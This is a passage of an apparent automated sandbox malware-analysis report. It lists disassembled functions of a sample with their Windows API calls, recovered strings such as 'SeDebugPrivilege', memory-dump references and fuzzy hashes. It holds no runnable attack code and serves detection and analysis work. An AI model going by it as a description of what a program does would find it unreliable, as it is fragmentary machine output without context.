                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 793581249-0
                                                                  • Opcode ID: ad3e6fac0e24c8909a7195dd85663fa0e089de522b46d31895a9303948dbde63
                                                                  • Instruction ID: a2dbd42c5a707cc60a0d9c0b1c68d866fe27f7280fadd8dd93ca4aa95544b1b2
                                                                  • Opcode Fuzzy Hash: ad3e6fac0e24c8909a7195dd85663fa0e089de522b46d31895a9303948dbde63
                                                                  • Instruction Fuzzy Hash: B95141B2A192199EDF66EB94D841DDE73BC9F08310F0044AAF609E7481EA7497C9CF60
                                                                  APIs
                                                                  • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,003CDAD1,00000004,00000000,00000000), ref: 0036EAEB
                                                                  • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,003CDAD1,00000004,00000000,00000000), ref: 0036EB32
                                                                  • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,003CDAD1,00000004,00000000,00000000), ref: 003CDC86
                                                                  • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,003CDAD1,00000004,00000000,00000000), ref: 003CDCF2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ShowWindow
                                                                  • String ID:
                                                                  • API String ID: 1268545403-0
                                                                  • Opcode ID: 764fa721ecb32790a1e80681f2610b16be191250c8872ba9cae022856a872aa5
                                                                  • Instruction ID: d8acac75e8d3a37532f72a01072c0d8bcf6d7722dda8c366fbc0d79191566a7e
                                                                  • Opcode Fuzzy Hash: 764fa721ecb32790a1e80681f2610b16be191250c8872ba9cae022856a872aa5
                                                                  • Instruction Fuzzy Hash: 2C41F57860D2809AD7374B28DD8DF7A7B9EAB41305F1AC41EF04787969C670AC48D715
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0038AEF1,00000B00,?,?), ref: 0038B26C
                                                                  • HeapAlloc.KERNEL32(00000000,?,0038AEF1,00000B00,?,?), ref: 0038B273
                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0038AEF1,00000B00,?,?), ref: 0038B288
                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,0038AEF1,00000B00,?,?), ref: 0038B290
                                                                  • DuplicateHandle.KERNEL32(00000000,?,0038AEF1,00000B00,?,?), ref: 0038B293
                                                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0038AEF1,00000B00,?,?), ref: 0038B2A3
                                                                  • GetCurrentProcess.KERNEL32(0038AEF1,00000000,?,0038AEF1,00000B00,?,?), ref: 0038B2AB
                                                                  • DuplicateHandle.KERNEL32(00000000,?,0038AEF1,00000B00,?,?), ref: 0038B2AE
                                                                  • CreateThread.KERNEL32(00000000,00000000,0038B2D4,00000000,00000000,00000000), ref: 0038B2C8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                   • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                  • String ID:
                                                                  • API String ID: 1957940570-0
                                                                  • Opcode ID: dd90ad3f8f58de50119c40cfd033860ae93368e0815fb43df8e9945467117512
                                                                  • Instruction ID: bf5e653f3f6cb11a4568577a0a12c3a2c92eaee3b29e1e107dd6b11b7fc3f283
                                                                  • Opcode Fuzzy Hash: dd90ad3f8f58de50119c40cfd033860ae93368e0815fb43df8e9945467117512
                                                                  • Instruction Fuzzy Hash: 7701C9B5641308BFE711AFA5EC4DF6B7BACEB88711F058412FA05DB1A1CA749800CB61
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                   • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                                  • API String ID: 0-572801152
                                                                  • Opcode ID: 39c846e7b95a0f9fa81a373969f927bd1547904df8808968a46876a3455f050f
                                                                  • Instruction ID: f0a63bbc72edb6f1ffecd84e8c5dafa73ffc2fab963b50293588c43ef92580f4
                                                                  • Opcode Fuzzy Hash: 39c846e7b95a0f9fa81a373969f927bd1547904df8808968a46876a3455f050f
                                                                  • Instruction Fuzzy Hash: 75E1E371A10219AFCF16DFA8C885BEE77B9FF4A314F158029F905AB281D771AD41CB90
                                                                  APIs
                                                                    • Part of subcall function 0035936C: __swprintf.LIBCMT ref: 003593AB
                                                                    • Part of subcall function 0035936C: __itow.LIBCMT ref: 003593DF
                                                                    • Part of subcall function 0036C6F4: _wcscpy.LIBCMT ref: 0036C717
                                                                  • _wcstok.LIBCMT ref: 003A184E
                                                                  • _wcscpy.LIBCMT ref: 003A18DD
                                                                  • _memset.LIBCMT ref: 003A1910
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                   • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                  • String ID: X$p2@l2@
                                                                  • API String ID: 774024439-1235596074
                                                                  • Opcode ID: 007e2206b5878b5e1c77b1c0665484326f0b4af5e73cb3bbc8456ddfb051a257
                                                                  • Instruction ID: 4103b075de2e493e670b78c16734549bd949d3c61ad42f89006d9e5ba91a09ad
                                                                  • Opcode Fuzzy Hash: 007e2206b5878b5e1c77b1c0665484326f0b4af5e73cb3bbc8456ddfb051a257
                                                                  • Instruction Fuzzy Hash: A0C190356043409FC726EF24C991E5AB7E4FF85355F01896DF89A9B2A1DB70ED08CB82
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 003B9B19
                                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 003B9B2D
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 003B9B47
                                                                  • _wcscat.LIBCMT ref: 003B9BA2
                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 003B9BB9
                                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 003B9BE7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                   • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window_wcscat
                                                                  • String ID: SysListView32
                                                                  • API String ID: 307300125-78025650
                                                                  • Opcode ID: 4109f0640831aa558596ec247fd16437d60f5018c6ba589efd3f53fa94c84885
                                                                  • Instruction ID: 9bf290d38b95cd34d6e9d1309a26a8f136f3053451ae25bb899cb72f2f7d416f
                                                                  • Opcode Fuzzy Hash: 4109f0640831aa558596ec247fd16437d60f5018c6ba589efd3f53fa94c84885
                                                                  • Instruction Fuzzy Hash: 2241BF70940308ABEB22DF64DC85BEA77A8EF08354F11442AF749AB291C6759D84CB60
                                                                  APIs
                                                                    • Part of subcall function 00396532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00396554
                                                                    • Part of subcall function 00396532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00396564
                                                                    • Part of subcall function 00396532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 003965F9
                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003B179A
                                                                  • GetLastError.KERNEL32 ref: 003B17AD
                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003B17D9
                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 003B1855
                                                                  • GetLastError.KERNEL32(00000000), ref: 003B1860
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003B1895
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                   • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                  • String ID: SeDebugPrivilege
                                                                  • API String ID: 2533919879-2896544425
                                                                  • Opcode ID: 8777210a7db05101f19bf356b12326c03d1d02872d33bf630592e2e149263f4b
                                                                  • Instruction ID: 0ddf0532d0270072e1ae0e1602e27f958e93808473c35e141dba490e5b9eee3c
                                                                  • Opcode Fuzzy Hash: 8777210a7db05101f19bf356b12326c03d1d02872d33bf630592e2e149263f4b
                                                                  • Instruction Fuzzy Hash: 9841BD71600201AFDB07EF54C8A6FAEB7A9BF44314F058059FA069F2D2DB75A904CB91
                                                                  APIs
                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 003958B8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                   • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: IconLoad
                                                                  • String ID: blank$info$question$stop$warning
                                                                  • API String ID: 2457776203-404129466
                                                                  • Opcode ID: 396b98d81a50871ac2832179cbb3f15e11d538d6885772ae94f029264e280a7b
                                                                  • Instruction ID: e63aff1b3c3b8302ce2ab2a8833f498d99d327c5cfbe5c8012613ad6fe58e00c
                                                                  • Opcode Fuzzy Hash: 396b98d81a50871ac2832179cbb3f15e11d538d6885772ae94f029264e280a7b
                                                                  • Instruction Fuzzy Hash: F911EB7230D742FAEB275F549C82E6A379C9F25714F30003BF514B52C1E775AA804368
                                                                  APIs
                                                                  • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0039A806
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                   • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ArraySafeVartype
                                                                  • String ID:
                                                                  • API String ID: 1725837607-0
                                                                  • Opcode ID: 0a7673f1d12cb98cfe096c162d1d13fbc1c664c1aaec17b976623d22d6669f81
                                                                  • Instruction ID: 79af4306f1c51698684e5997bfbf2dface8f83eaf64b7a34d5237cf944a4b6c4
                                                                  • Opcode Fuzzy Hash: 0a7673f1d12cb98cfe096c162d1d13fbc1c664c1aaec17b976623d22d6669f81
                                                                  • Instruction Fuzzy Hash: 8DC18A75A0561A9FDF02CF98D481BAEB7F4FF08315F20816AE605EB241DB34AA41CBD1
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00396B63
                                                                  • LoadStringW.USER32(00000000), ref: 00396B6A
                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00396B80
                                                                  • LoadStringW.USER32(00000000), ref: 00396B87
                                                                  • _wprintf.LIBCMT ref: 00396BAD
                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00396BCB
                                                                  Strings
                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 00396BA8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                   • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                  • API String ID: 3648134473-3128320259
                                                                  • Opcode ID: 7708533283f77843a148e1346eb137ee9d0d30c058cbc453e9b1035e0456f98c
                                                                  • Instruction ID: c55a9449bc4ebc77a164186a5a7af352ff5b2d2e39f6f9f0334ae3e9ffa24d34
                                                                  • Opcode Fuzzy Hash: 7708533283f77843a148e1346eb137ee9d0d30c058cbc453e9b1035e0456f98c
                                                                  • Instruction Fuzzy Hash: 020136F75012187FEB52ABA4AD89EF7776CE704304F0044A6B745E6041EA74DE858F74
                                                                  APIs
                                                                    • Part of subcall function 003B3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003B2BB5,?,?), ref: 003B3C1D
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003B2BF6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                   • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharConnectRegistryUpper
                                                                  • String ID:
                                                                  • API String ID: 2595220575-0
                                                                  • Opcode ID: 890dd58486df24d57c6e92d5b23182523af4628963f93762bef6628677dc1e49
                                                                  • Instruction ID: 8f4610983014e275cde0842daf7669a8af760d79f2bbaba7b1a8379c085491f6
                                                                  • Opcode Fuzzy Hash: 890dd58486df24d57c6e92d5b23182523af4628963f93762bef6628677dc1e49
                                                                  • Instruction Fuzzy Hash: AD917D712042019FCB12EF54C895FAEBBE5FF88314F04895DFA969B2A1DB34E905CB42
                                                                  APIs
                                                                  • select.WSOCK32 ref: 003A9691
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 003A969E
                                                                  • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 003A96C8
                                                                  • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 003A96E9
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 003A96F8
                                                                  • htons.WSOCK32(?,?,?,00000000,?), ref: 003A97AA
                                                                  • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,003EDC00), ref: 003A9765
                                                                    • Part of subcall function 0038D2FF: _strlen.LIBCMT ref: 0038D309
                                                                  • _strlen.LIBCMT ref: 003A9800
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                   • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                                  • String ID:
                                                                  • API String ID: 3480843537-0
                                                                  • Opcode ID: e14596ce8eff3280019f25d872cd1bfa9d863d1d01824e7e84f7137b9451e468
                                                                  • Instruction ID: c627b949310e6c4d5f1208735c9365df76a13e677f1baeea83a1b56ac7cdf8ca
                                                                  • Opcode Fuzzy Hash: e14596ce8eff3280019f25d872cd1bfa9d863d1d01824e7e84f7137b9451e468
                                                                  • Instruction Fuzzy Hash: B081AE31504200AFC716EF64DC85F6BB7ACEF86714F108A1EF955AB2A1EB30D904CB92
                                                                  APIs
                                                                  • __mtinitlocknum.LIBCMT ref: 0037A991
                                                                    • Part of subcall function 00377D7C: __FF_MSGBANNER.LIBCMT ref: 00377D91
                                                                    • Part of subcall function 00377D7C: __NMSG_WRITE.LIBCMT ref: 00377D98
                                                                    • Part of subcall function 00377D7C: __malloc_crt.LIBCMT ref: 00377DB8
                                                                  • __lock.LIBCMT ref: 0037A9A4
                                                                  • __lock.LIBCMT ref: 0037A9F0
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00406DE0,00000018,00385E7B,?,00000000,00000109), ref: 0037AA0C
                                                                  • EnterCriticalSection.KERNEL32(8000000C,00406DE0,00000018,00385E7B,?,00000000,00000109), ref: 0037AA29
                                                                  • LeaveCriticalSection.KERNEL32(8000000C), ref: 0037AA39
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                  • String ID:
                                                                  • API String ID: 1422805418-0
                                                                  • Opcode ID: 4dfa9d9bff4298492f7cd5dd2022eb827325b90c66c37e613235c8d1f24c5c25
                                                                  • Instruction ID: 23f8b4f4185ddb5cb3c408b335994fad34b70e7cf199f23d22ace278f1454cd9
                                                                  • Opcode Fuzzy Hash: 4dfa9d9bff4298492f7cd5dd2022eb827325b90c66c37e613235c8d1f24c5c25
                                                                  • Instruction Fuzzy Hash: A3415A71900A06DBEB729F68DA4179CB7B0AF45334F11C229E42DAF2D1D7BC9840CB86
                                                                  APIs
                                                                  • DeleteObject.GDI32(00000000), ref: 003B8EE4
                                                                  • GetDC.USER32(00000000), ref: 003B8EEC
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003B8EF7
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 003B8F03
                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 003B8F3F
                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 003B8F50
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,003BBD19,?,?,000000FF,00000000,?,000000FF,?), ref: 003B8F8A
                                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 003B8FAA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                  • String ID:
                                                                  • API String ID: 3864802216-0
                                                                  • Opcode ID: c74995144572a7d8faed709598054babee0624b74e653661521f66d8dea6492b
                                                                  • Instruction ID: fe65c1d5f4e149907cb210551cdbbcb3ff503281c5611382f8ace75835cdc3c2
                                                                  • Opcode Fuzzy Hash: c74995144572a7d8faed709598054babee0624b74e653661521f66d8dea6492b
                                                                  • Instruction Fuzzy Hash: 17317F72141214BFEB128F54DC89FEA3BADEF49715F054065FE089A191D6759841CBB0
                                                                  APIs
                                                                    • Part of subcall function 0036B34E: GetWindowLongW.USER32(?,000000EB), ref: 0036B35F
                                                                  • GetSystemMetrics.USER32(0000000F), ref: 003C016D
                                                                  • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 003C038D
                                                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 003C03AB
                                                                  • InvalidateRect.USER32(?,00000000,00000001,?), ref: 003C03D6
                                                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 003C03FF
                                                                  • ShowWindow.USER32(00000003,00000000), ref: 003C0421
                                                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 003C0440
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                  • String ID:
                                                                  • API String ID: 3356174886-0
                                                                  • Opcode ID: 0fea52f2973ce73050a9528db25c4724cc9bbfec0dcde92b1cc6761df4660b64
                                                                  • Instruction ID: 3de80e71b7d505b2b8a6d2c7b43b5e13635ccdce977beee60bca137c01204da8
                                                                  • Opcode Fuzzy Hash: 0fea52f2973ce73050a9528db25c4724cc9bbfec0dcde92b1cc6761df4660b64
                                                                  • Instruction Fuzzy Hash: E3A19E35600696EBDB1ECF68C985BBEBBB5BF04700F058159E854EB290DB34AD50CB90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 762565d1067c1a9ac6ccc4c4148e0e2165821e4236b68a06d0e63d957b8345b2
